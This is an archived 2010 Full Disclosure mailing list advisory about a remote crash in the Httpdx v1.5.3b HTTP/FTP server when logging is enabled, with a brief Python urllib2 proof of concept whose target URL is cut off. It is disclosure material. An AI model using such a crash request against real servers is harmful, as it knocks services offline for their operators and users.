Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Vulnerability Httpdx v1.5.3b
From: Mehdi Mahdjoub - Sysdream IT Security Services <m.mahdjoub () sysdream com>
Date: Fri, 19 Mar 2010 15:48:21 +0100

Program          : Httpdx v1.5.3b
PoC              : Remote Crash Service (if http.log=1)
Homepage         : http://sourceforge.net/projects/httpdx/
Found by         : Jonathan Salwan
This Advisory    : Jonathan Salwan
Contact          : j.salwan () sysdream com

//----- Application description
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file. 
//----- Description of vulnerability
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
Use simple GET request for crash service.

//----- Credits

import urllib
import urllib2

url = ';

req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page = answer.read()

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Vulnerability Httpdx v1.5.3b Mehdi Mahdjoub - Sysdream IT Security Services (Mar 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]